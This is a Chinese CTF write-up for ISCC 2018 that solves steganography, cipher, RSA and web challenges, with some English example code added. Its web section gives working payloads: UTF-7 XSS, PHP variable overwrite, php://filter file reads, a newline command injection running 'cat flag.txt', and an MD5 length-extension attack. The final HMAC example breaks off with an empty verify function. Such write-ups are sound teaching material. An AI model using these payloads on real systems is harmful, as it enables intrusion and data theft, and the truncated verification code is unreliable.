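ISCC 2018 Partial Write-up

Hmm, I only just noticed that the ISCC competition has ended and the platform has been shut down too (orz). I didn't download the attachments and haven't had time to tidy up the write-up; too much going on lately (orz), so make do with this.

One annoying thing is that the flag format is confusing: for flag{xxx} you submit just xx, without the flag{}. Scratch that, scratch that: sometimes you do submit flag{xx}.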

Misc

Misc1 What is that?

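Preview image:

It's obvious: change the image height.

Open the file in 010 Editor and choose PNG under Templates (if you don't have the template, download it via the link and import it).

Save, and the flag is visible: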

flag{_Welcome_To_ISCC_2018_}
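
Editing the height by hand works, but the IHDR CRC still reflects the original dimensions, so the correct height can be recovered by searching for the value that makes the CRC match. This is an added example, not part of the original write-up; it assumes only the height field was altered, and the 500x600 header, function names and max_height limit are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def ihdr_chunk(width, height):
    """Build a valid IHDR chunk (8-bit RGB) for the constructed sample."""
    data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + b"IHDR" + data + struct.pack(">I", crc)

def parse_ihdr(png):
    """Return (width, height, stored_crc, ihdr_data) from the first chunk."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG with a leading IHDR chunk")
    data = png[16:29]                        # 13 bytes of IHDR data
    width, height = struct.unpack(">II", data[:8])
    (stored_crc,) = struct.unpack(">I", png[29:33])
    return width, height, stored_crc, data

def recover_height(png, max_height=8192):
    """Return the height that satisfies the stored IHDR CRC, or None."""
    width, height, stored_crc, data = parse_ihdr(png)
    if zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF == stored_crc:
        return height                        # header is consistent as stored
    for h in range(1, max_height + 1):
        candidate = data[:4] + struct.pack(">I", h) + data[8:]
        if zlib.crc32(b"IHDR" + candidate) & 0xFFFFFFFF == stored_crc:
            return h
    return None

def patch_height(png, height):
    """Return a copy with the height field rewritten (CRC left untouched)."""
    return png[:20] + struct.pack(">I", height) + png[24:]

# Constructed sample: header of a 500x600 image whose height field was cut to 300
ORIGINAL = PNG_SIG + ihdr_chunk(500, 600)
TAMPERED = patch_height(ORIGINAL, 300)
```

A CRC mismatch on IHDR is also a quick triage signal that an image's dimensions were edited after it was written.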

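Misc2 Secret Telegram (秘密电报)

Unzipping on a Mac showed a pile of garbled characters; I thought that was how the challenge was meant to look and puzzled over it for ages = =

Secret telegram:
Knowledge is power ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

Two symbols, so it could be Morse code or the Bacon cipher.

The ciphertext is 45 characters long (a multiple of 5), so the Bacon cipher is more likely.

The Bacon cipher has two variants; see the Baidu Baike entry on the Bacon cipher.

Try decoding with the second variant first: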

#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'

def foo():
    # Second variant: 24 codes, with i/j and u/v sharing one code each
    dic={}
    s_dic="""
a AAAAA g AABBA n ABBAA t BAABA
b AAAAB h AABBB o ABBAB u-v BAABB
c AAABA i-j ABAAA p ABBBA w BABAA
d AAABB k ABAAB q ABBBB x BABAB
e AABAA l ABABA r BAAAA y BABBA
f AABAB m ABABB s BAAAB z BABBB
"""
    # Build the reverse table: code -> letter
    l_dic=s_dic.split()
    for idx in range(0,len(l_dic),2):
        dic[l_dic[idx+1]]=l_dic[idx]
    print dic
    cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'
    # Split the ciphertext into groups of five symbols
    l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
    print len(l_cipher),l_cipher
    rst=[dic[i] for i in l_cipher]
    print rst

if __name__ == '__main__':
    foo()
    print 'ok'

output:

{'ABBAB': 'o', 'ABBAA': 'n', 'BABAA': 'w', 'BABAB': 'x', 'ABAAA': 'i-j', 'ABAAB': 'k', 'AABBB': 'h', 'AABBA': 'g', 'BAABB': 'u-v', 'BAABA': 't', 'AAABA': 'c', 'AAABB': 'd', 'ABBBB': 'q', 'ABBBA': 'p', 'ABABA': 'l', 'ABABB': 'm', 'BABBA': 'y', 'BABBB': 'z', 'AABAB': 'f', 'AABAA': 'e', 'BAAAB': 's', 'BAAAA': 'r', 'AAAAA': 'a', 'AAAAB': 'b'}
9 ['ABAAA', 'ABABB', 'ABAAA', 'ABABA', 'AABAA', 'ABAAA', 'BAABA', 'AAABA', 'AAABA']
['i-j', 'm', 'i-j', 'l', 'e', 'i-j', 't', 'c', 'c']
ok

That doesn't look right.

The first variant:

#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'

def foo1():
    # Second variant (kept from the previous attempt)
    dic={}
    s_dic="""
a AAAAA g AABBA n ABBAA t BAABA
b AAAAB h AABBB o ABBAB u-v BAABB
c AAABA i-j ABAAA p ABBBA w BABAA
d AAABB k ABAAB q ABBBB x BABAB
e AABAA l ABABA r BAAAA y BABBA
f AABAB m ABABB s BAAAB z BABBB
"""
    l_dic=s_dic.split()
    for idx in range(0,len(l_dic),2):
        dic[l_dic[idx+1]]=l_dic[idx]
    print dic
    cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'
    l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
    print len(l_cipher),l_cipher
    rst=[dic[i] for i in l_cipher]
    print rst

def foo():
    # First variant: 26 codes, one per letter
    dic={}
    s_dic="""
A aaaaa
B aaaab
C aaaba
D aaabb
E aabaa
F aabab
G aabba
H aabbb
I abaaa
J abaab
K ababa
L ababb
M abbaa
N abbab
O abbba
P abbbb
Q baaaa
R baaab
S baaba
T baabb
U babaa
V babab
W babba
X babbb
Y bbaaa
Z bbaab
"""
    # Build the reverse table: code -> letter
    l_dic=s_dic.strip().split()
    for idx in range(0,len(l_dic),2):
        dic[l_dic[idx+1]]=l_dic[idx]
    print dic
    cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'.lower()
    # Split the ciphertext into groups of five symbols
    l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
    print len(l_cipher),l_cipher
    rst=[dic[i] for i in l_cipher]
    print rst
    print ''.join(rst)

if __name__ == '__main__':
    foo()
    print 'ok'

output:

{'aabbb': 'H', 'aabba': 'G', 'baaab': 'R', 'baaaa': 'Q', 'bbaab': 'Z', 'bbaaa': 'Y', 'abbab': 'N', 'abbaa': 'M', 'babaa': 'U', 'babab': 'V', 'abaaa': 'I', 'abaab': 'J', 'aabab': 'F', 'aabaa': 'E', 'aaaaa': 'A', 'aaaab': 'B', 'baabb': 'T', 'baaba': 'S', 'aaaba': 'C', 'aaabb': 'D', 'abbbb': 'P', 'abbba': 'O', 'ababa': 'K', 'ababb': 'L', 'babba': 'W', 'babbb': 'X'}
9 ['abaaa', 'ababb', 'abaaa', 'ababa', 'aabaa', 'abaaa', 'baaba', 'aaaba', 'aaaba']
['I', 'L', 'I', 'K', 'E', 'I', 'S', 'C', 'C']
ILIKEISCC
ok

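Got the flag: ILIKEISCC

Misc3 Where is the FLAG?

Open the file in 010 Editor; the string Adobe Fireworks CS5 shows up.

Download Adobe Fireworks CS5, install it, and open the file:

Click off the little eye icon in front of the bitmap layer and the QR code appears. What's left is a jigsaw puzzle; once it is assembled, scanning the QR code gives flag{a332b700-3621-11e7-a53b-6807154a58cf}

Submit a332b700-3621-11e7-a53b-6807154a58cf

Misc4 A Cat's Thoughts (一只猫的心思)

Carve a doc out by hand; the doc file header is D0 CF 11 E0.

File contents: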

名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

Thanks to a senior labmate: decrypt with the 与佛论禅 ("Talking Zen with Buddha") decoder at http://www.keyfc.net/bbs/tools/tudoucode.aspx

hex2str:


base64:

GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

b32:

5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

hex2str:

R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==

base64:

GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====

base32:

463161395F69735F493563635F5A4F6C385F4733545030314E54

hex2str:

F1a9_is_I5cc_ZOl8_G3TP01NT

Submit I5cc_ZOl8_G3TP01NT
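
The hex, base32 and base64 layers above can be peeled mechanically instead of by hand. This is an added example, not part of the original write-up: it tries each decoding in turn and stops when none fits. The input is constructed by re-wrapping the page's final plaintext, and the function names are hypothetical.

```python
import base64
import binascii
import re

# Tried in this order: hex text is also valid base64, base32 text likewise.
LAYERS = (
    ("hex", re.compile(r"(?:[0-9A-Fa-f]{2})+"), binascii.unhexlify),
    ("base32", re.compile(r"[A-Z2-7]+=*"), base64.b32decode),
    ("base64", re.compile(r"[A-Za-z0-9+/]+={0,2}"),
     lambda s: base64.b64decode(s, validate=True)),
)

def printable(raw):
    """Return raw as ASCII text, or None if it is empty or not printable."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None

def peel_once(text):
    """Return (layer_name, decoded_text) for the first layer that fits, else None."""
    for name, pattern, decode in LAYERS:
        if not pattern.fullmatch(text):
            continue
        try:
            decoded = printable(decode(text))
        except (binascii.Error, ValueError):
            continue
        if decoded is not None:
            return name, decoded
    return None

def peel_all(text, max_layers=16):
    """Strip layers until none fits; return (layer_names, remaining_text)."""
    names = []
    for _ in range(max_layers):
        step = peel_once(text.strip())
        if step is None:
            break
        names.append(step[0])
        text = step[1]
    return names, text

def wrap(plain):
    """Constructed input: plain -> hex -> base32 -> base64 (the page's last steps)."""
    hexed = binascii.hexlify(plain.encode()).upper()
    return base64.b64encode(base64.b32encode(hexed)).decode()

SAMPLE = wrap("F1a9_is_I5cc_ZOl8_G3TP01NT")
```

Requiring printable output after every step is what keeps a wrong guess (for example, treating base32 text as base64) from being accepted.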

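Misc5 Brute-Force XX Is Not Advisable (暴力XX不可取)

Challenge: vfppjrnerpbzvat

Caesar decryption; at ROT13 it gives: isccwearecoming

Misc Layers of Spy Shadows (重重谍影)

This is a lateral-thinking challenge, dead simple. The answer lies behind layer upon layer of fog; an instant is eternity. Namo Amitabha.

Challenge: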

Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZqRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==

base64 * n (mind the URL decoding):

U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4%0AB5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z%0AiN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc%3D

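URL-decode (do not decode the +)

AES decryption

Decrypt with the 与佛论禅 decoder at http://www.keyfc.net/bbs/tools/tudoucode.aspx

Misc Caesar the Thirteenth (凯撒十三世)

After learning to use a keyboard, Caesar the Thirteenth threw a string of characters at you: "ebdgc697g95w3". Take a guess.

Caesar the Thirteenth -> rot13 -> roqtp697t95j3

Keyboard cipher: replace each character with the key directly below it: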

1 2 3 4 5 6 7 8 9 0
Q W E R T Y U I O P
A S D F G H J K L
Z X C V B N M

Got the flag: flagyougotme

Submit yougotme

Misc Fun ISCC (有趣的ISCC)

Open the file in 010 Editor, scroll to the end, copy the bytes, and feed them to a Python script:

#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'
import re

def foo():
    # UTF-16LE bytes copied from the end of the file
    s="""
26 00 23 00 39 00 32 00 3B 00 26 00 23 00 31 00
31 00 37 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 35 00 34 00 3B 00 26 00
23 00 39 00 32 00 3B 00 26 00 23 00 31 00 31 00
37 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 35 00 34 00
3B 00 26 00 23 00 39 00 39 00 3B 00 26 00 23 00
39 00 32 00 3B 00 26 00 23 00 31 00 31 00 37 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 35 00 34 00 3B 00
26 00 23 00 34 00 39 00 3B 00 26 00 23 00 39 00
32 00 3B 00 26 00 23 00 31 00 31 00 37 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 35 00 34 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 39 00 32 00
3B 00 26 00 23 00 31 00 31 00 37 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 35 00 35 00 3B 00 26 00 23 00
39 00 38 00 3B 00 26 00 23 00 39 00 32 00 3B 00
26 00 23 00 31 00 31 00 37 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 35 00 34 00 3B 00 26 00 23 00 35 00
37 00 3B 00 26 00 23 00 39 00 32 00 3B 00 26 00
23 00 31 00 31 00 37 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 35 00 31 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 34 00 3B 00 26 00 23 00 35 00 31 00 3B 00
26 00 23 00 39 00 32 00 3B 00 26 00 23 00 31 00
31 00 37 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 35 00 31 00 3B 00 26 00
23 00 39 00 32 00 3B 00 26 00 23 00 31 00 31 00
37 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 35 00 30 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
39 00 32 00 3B 00 26 00 23 00 31 00 31 00 37 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 35 00 34 00 3B 00
26 00 23 00 35 00 37 00 3B 00 26 00 23 00 39 00
32 00 3B 00 26 00 23 00 31 00 31 00 37 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 35 00 35 00 3B 00 26 00
23 00 35 00 31 00 3B 00 26 00 23 00 39 00 32 00
3B 00 26 00 23 00 31 00 31 00 37 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 35 00 30 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 39 00 32 00 3B 00
26 00 23 00 31 00 31 00 37 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 35 00 34 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 39 00 32 00 3B 00 26 00
23 00 31 00 31 00 37 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 35 00 33 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 34 00 3B 00 26 00 23 00 31 00 30 00 31 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 35 00 3B 00 26 00 23 00 31 00 30 00 30 00
3B
"""
    # Drop the 00 high bytes and turn the remaining bytes into ASCII characters
    l=s.strip().split()
    l=[i for i in l if i!='00']
    l=[chr(int(i,16)) for i in l]
    print l
    rst=''.join(l)
    print rst
    # The result is a run of HTML numeric entities (&#NN;)
    l=re.findall('&#(.*?);',rst)
    print l
    l=[chr(int(i)) for i in l]
    rst=''.join(l)
    print rst
    # The entities spell out \uXXXX escapes; decode those last
    a = rst.decode('unicode-escape').encode('utf-8')
    print a

if __name__ == '__main__':
    foo()
    print 'ok'

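Got the flag: flag{iscc is fun}

Submit iscc is fun

Web

Web1 Compare the Numbers (比较数字大小)

Right-click the input box, choose Inspect Element, change maxlength to 300, enter a long run of 9s, and submit.

The response: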

key is 768HKyu678567&*&K

Submit 768HKyu678567&*&K

Web2 Can You Get Across? (你能跨过去吗?)

http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-&_=1302746925413

+/v+ is an obvious UTF-7 marker.

Decode it with an online UTF-7 decoder.

Decoded:

+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-

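This gives key:/%nsfocusXSStest%/; submit it to get the flag: Hell0World

Web3 It's All a Routine (一切都是套路)

The challenge already gives a hint:

It looks like someone forgot to delete a file

So, without further ado, I scanned for common source-code leaks and found http://118.190.152.202:8009/index.php.txt

The source: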

<?php
include "flag.php";
if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("flag is here");
if (!isset($_POST["flag"]) )
    die($_403);
foreach ($_GET as $k => $v){
    $$k = $$v;
}
foreach ($_POST as $k => $v){
    $$k = $v;
}
if ( $_POST["flag"] !== $flag )
    die($_403);
echo "flag: ". $flag . "\n";
die($_200);
?>

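Variable overwrite: send _200=flag via GET, then flag=a via POST, and you get the flag: ISCC{taolu2333333....}

The GET loop copies $flag into $_200 before the POST loop overwrites $flag with a, so the comparison passes and the final die($_200) prints the real flag.

Web5 web02

Add the request header client-ip: 127.0.0.1

Got the flag: ISCC{iscc_059eeb8c0c33eb62}

Web6 The Art of SQL Injection (SQL注入的艺术)

Wide-byte injection / scan for the database file

Database file: /admins

Got the flag, but I forgot to note down what it was (orz).

Web7 Give It a Try (试试看)

The page opens with a single image; view the source: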

<img src="show.php?img=1.jpg">

Go to show.php?img=1.jpg

payload:

view-source:http://118.190.152.202:8006/show.php?img=php://filter/resource=1.jpgresource=../flag.php

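Got the flag: flag{1ntere5ting_PHP_Regu1ar_express1onssssss}

Submit flag{1ntere5ting_PHP_Regu1ar_express1onssssss}

Web The Lure of Localhost (本地的诱惑)

Right-click and view the page source to get the flag: ISCC{^&*(UIHKJjkadshf}

Submit ISCC{^&*(UIHKJjkadshf}

Web Please Ping My IP: Can You Get Through? (请ping我的ip 看你能Ping通吗?)

I've filtered everything; let's see how you get around it.
Challenge URL: http://118.190.152.202:8018

Command execution: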

http://118.190.152.202:8018/?ip=www.baidu.com%0Acat%20flag.txt

Got the flag: ISCC{8a8646c7a2fce16b166fbc68ca65f9e4}

Web Please give me username and password!

<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
    if (0 == strcasecmp($flag,$_GET['username'])){
        $a = fla;
        echo "very good!Username is right";
    }
    else{
        print 'Username is not right<!--index.php.txt-->';}
}else
    print 'Please give me username or password!';
if (isset($_GET['password'])){
    if (is_numeric($_GET['password'])){
        if (strlen($_GET['password']) < 4){
            if ($_GET['password'] > 999){
                $b = g;
                print '<p>very good!Password is right</p>';
            }else
                print '<p>Password too little</p>';
        }else
            print '<p>Password too long</p>';
    }else
        print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
    print $flag;
?>

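payload: ?username[]=fla&password=9e9

In PHP versions before 8, passing username as an array makes strcasecmp() return NULL, and 0 == NULL is true; 9e9 is numeric, three characters long, and greater than 999.

Got the flag: flag{ISCC2018_Very_GOOD!}

Submit flag{ISCC2018_Very_GOOD!}

Re

Re1 RSA256

Use OpenSSL to extract n and e: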

http://skysec.top/2017/07/25/RSA%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7/#openssl

fujian cyto$ openssl rsa -in public.key -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54:
5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55:
d5:55:eb
Exponent: 65537 (0x10001)
Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB

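The upper value is e and the lower one is n.

Factor n to get p and q:

http://factordb.com/index.php?query=98432079271513130981267919056149161631892822707167177858831841699521774310891

The first factor is p and the second is q.

With p, q, n and e known, recover the plaintext: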

#!/usr/bin/env python2
# -*- coding:utf8 -*-
import gmpy
import rsa

def foo():
    p=302825536744096741518546212761194311477
    q=325045504186436346209877301320131277983
    n=98432079271513130981267919056149161631892822707167177858831841699521774310891
    e=65537
    # Private exponent: d = e^-1 mod (p-1)(q-1)
    d=int(gmpy.invert(e,(p-1)*(q-1)))
    private_key=rsa.PrivateKey(n,e,d,p,q)
    # Each attachment holds one piece of the flag
    with open('fujian/encrypted.message1','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()
    with open('fujian/encrypted.message2','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()
    with open('fujian/encrypted.message3','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()

if __name__ == '__main__':
    foo()
    print 'ok'

output:

flag{3b6d3806-4b2b
-11e7-95a0-
000c29d7e93d}
ok

Got the flag: flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}

Web Collide

Challenge source:

<?php
include "secret.php";
@$username=(string)$_POST['username'];
function enc($text){
    global $key;
    return md5($key.$text);
}
if(enc($username) === $_COOKIE['verify']){
    if(is_numeric(strpos($username, "admin"))){
        die($flag);
    }
    else{
        die("you are not admin");
    }
}
else{
    setcookie("verify", enc("guest"), time()+60*60*24*7);
    setcookie("len", strlen($key), time()+60*60*24*7);
}
show_source(__FILE__);

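enc() uses md5, the result is tied to a cookie, and the check is done that way, so this is undoubtedly a hash length extension attack.

Extend the cookie's message from guest to guest + a pile of junk bytes + admin.

Ready-made tool: https://github.com/iagox86/hash_extender

Command: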

./hash_extender -f md5 -l 46 -d "guest" -s 78cfc57d983b4a17e55828c001a3e781 -a "admin"

Where:

  • -f: hash type
  • -l: length
  • -d: the original string to extend.
  • -s: the hash of the original string.
  • -a: the string to append.

CytoMbp:hash_extender cyto$ ./hash_extender -f md5 -l 46 -d "guest" -s 78cfc57d983b4a17e55828c001a3e781 -a "admin"
Type: md5
Secret length: 46
New signature: 5f585093a7fe86971766c3d25c43d0eb
New string: 67756573748000000000980100000000000061646d696e

Set verify in the cookie to the New signature, and change the POSTed username to the New string (edit it as hex in Burp).

Got the flag: ISCC{MD5_1s_n0t_5afe}
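
Why the tool needs the secret length, and what fixes the check: this added example (not from the original write-up or from hash_extender) rebuilds the MD5 padding that sits between guest and admin in the New string above, then shows an HMAC tag with an exact username comparison as the hardened form. The 46-byte KEY is a constructed placeholder and the function names are hypothetical.

```python
import hashlib
import hmac
import struct

def md5_padding(total_len):
    """Padding MD5 appends to a message of total_len bytes."""
    zeros = (55 - total_len) % 64            # pad to 56 mod 64 after the 0x80 byte
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", total_len * 8)

def extended_message(known, append, secret_len):
    """known || padding for (secret || known) || append, as in the New string."""
    return known + md5_padding(secret_len + len(known)) + append

def weak_tag(key, msg):
    """The construction from the challenge source: md5(key . text)."""
    return hashlib.md5(key + msg).hexdigest()

def hmac_tag(key, msg):
    """Hardened replacement: HMAC's outer hash stops a known tag being extended."""
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

def verify(key, msg, tag):
    """Constant-time comparison of the expected HMAC tag with the supplied one."""
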